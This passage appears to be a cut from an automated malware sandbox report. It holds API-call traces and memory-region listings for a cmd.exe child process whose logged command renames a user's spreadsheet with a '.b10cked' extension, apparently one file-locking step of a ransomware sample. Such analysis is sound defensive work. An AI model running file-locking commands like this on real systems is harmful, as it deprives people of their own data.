lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.577] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 
0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x32, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x32, lpOverlapped=0x0) 
returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.579] _close (_FileHandle=4) returned 0 [0142.579] FindNextFileW (in: hFindFile=0x360e90, lpFindFileData=0x2cf41c | out: lpFindFileData=0x2cf41c) returned 0 [0142.580] GetLastError () returned 0x12 [0142.580] FindClose (in: hFindFile=0x360e90 | out: hFindFile=0x360e90) returned 1 [0142.580] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.581] _close (_FileHandle=3) returned 0 [0142.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.581] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.581] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.581] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.582] SetConsoleInputExeNameW () returned 0x1 [0142.582] GetConsoleOutputCP () returned 0x1b5 [0142.582] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.582] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.582] exit (_Code=0) Process: id = "162" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xdbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 
AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14731 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14732 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14733 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14734 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 14735 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14736 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14737 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14738 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14739 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14740 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" 
filename = "" Region: id = 15546 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15547 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15548 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15549 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 15550 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 15551 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15552 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15554 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15555 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 
15556 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15557 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15558 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15559 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15560 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 15561 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15562 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15563 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15564 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15565 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15566 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000f0000" filename = "" Region: id = 15567 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 15568 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 15569 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 219 os_tid = 0xde0 [0140.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fca4 | out: lpSystemTimeAsFileTime=0x20fca4*(dwLowDateTime=0x8d7d3a00, dwHighDateTime=0x1d440a9)) [0140.186] GetCurrentProcessId () returned 0xdbc [0140.186] GetCurrentThreadId () returned 0xde0 [0140.186] GetTickCount () returned 0x2c080 [0140.186] QueryPerformanceCounter (in: lpPerformanceCount=0x20fc9c | out: lpPerformanceCount=0x20fc9c*=19697542333) returned 1 [0140.187] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.187] __set_app_type (_Type=0x1) [0140.187] __p__fmode () returned 0x76b331f4 [0140.187] __p__commode () returned 0x76b331fc [0140.187] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.187] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.187] GetCurrentThreadId () returned 0xde0 [0140.188] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x38 [0140.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.188] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.188] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.188] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.188] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fc34 | out: phkResult=0x20fc34*=0x0) returned 0x2 [0140.188] VirtualQuery (in: lpAddress=0x20fc6b, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.188] GetConsoleOutputCP () returned 0x1b5 [0140.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.188] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.189] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.189] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.189] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.189] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.189] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.190] GetEnvironmentStringsW () returned 0x3c01a0* [0140.190] FreeEnvironmentStringsW (penv=0x3c01a0) returned 1 [0140.190] GetEnvironmentStringsW () returned 0x3c01a0* [0140.190] FreeEnvironmentStringsW (penv=0x3c01a0) returned 1 [0140.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eba4 | out: phkResult=0x20eba4*=0x40) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0xc8, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x0, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, 
lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegCloseKey (hKey=0x40) returned 0x0 [0140.191] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eba4 | out: phkResult=0x20eba4*=0x40) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x0, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegCloseKey (hKey=0x40) returned 0x0 [0140.191] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.191] srand (_Seed=0x5b88636e) [0140.191] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" [0140.191] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" [0140.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.192] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.192] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.192] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.192] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.192] _wcsicmp 
(_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.192] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.192] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.192] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.192] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.192] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.192] GetEnvironmentStringsW () returned 0x3c22f0* [0140.192] FreeEnvironmentStringsW (penv=0x3c22f0) returned 1 [0140.192] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.193] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.193] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.193] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.193] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.193] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.193] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.193] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f970 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.193] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f970, lpFilePart=0x20f96c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f96c*="Desktop") 